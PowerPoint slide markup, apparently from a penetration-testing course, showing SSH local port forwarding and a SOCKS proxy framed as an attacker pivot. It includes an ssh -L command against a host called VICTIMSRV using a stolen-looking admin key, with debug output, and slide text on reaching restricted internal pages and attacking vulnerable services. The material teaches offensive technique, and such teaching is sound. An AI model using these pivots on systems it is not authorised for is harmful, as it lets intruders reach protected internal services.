          <a:xfrm>
            <a:off x="845217" y="1686740"/>
            <a:ext cx="9574129" cy="4216539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># Connect to VICTIMSRV via SSH as '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>serveradmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>' using certificate auth, forward remote localhost port 80 to local attacker host 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -v -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -L 8080:127.0.0.1:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serveradmin@victimsrv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-v verbose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> key based authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>local_listen_port:remote_host:remote_listen_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>username@servername</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> debug info showing port forwarding completed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>debug1: Local connections to LOCALHOST:8080 forwarded to remote address 127.0.0.1:80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>debug1: Local forwarding listening on ::1 port 8080.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>debug1: channel 0: new [port listener]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>debug1: Local forwarding listening on 127.0.0.1 port 8080.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4803648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7A5E6A-D01F-4643-81A2-8C466A518B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418682" y="0"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH Port Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AE6A645-CD6C-465F-A883-407BBFF3121C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3978441" y="1691427"/>
            <a:ext cx="8089232"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70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t># Opening localhost:8080 on attacker Firefox shows remote server's secured web page</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="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pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="Picture 10" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB9B0B68-6F37-45A8-A19A-F7CC1D0F69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55957" y="2151549"/>
            <a:ext cx="5943600" cy="427672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FE1A3783-2028-4353-9BB8-952C20E8BB0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="495300" y="63341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 TODO: replace localhost:8080 image with nagios or elasticsearch web page</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 name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9D6ADBD-4754-49B4-A67F-985A39C46503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="2110430"/>
            <a:ext cx="3582403" cy="671915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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Elevate your privileges, attack a vulnerable service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34753341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26798C0-3120-4922-A2D8-16E731A647E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2235200"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“Only the servers can talk to that”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31885916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7A5E6A-D01F-4643-81A2-8C466A518B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418682" y="0"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH SOCKS Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C27ED1B-0280-4A37-A752-CE3A342CF66D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418682" y="1600200"/>
            <a:ext cx="3932237" cy="3811588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHAT IS SOCKS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E0B55DD-3E04-4DBA-AE1C-B62A3C60A29A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418682" y="2028665"/>
            <a:ext cx="4646613" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Originally developed/designed by David </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Koblas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, a system administrator of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MIPS Computer Systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Made publicly available at 1992 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Usenix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
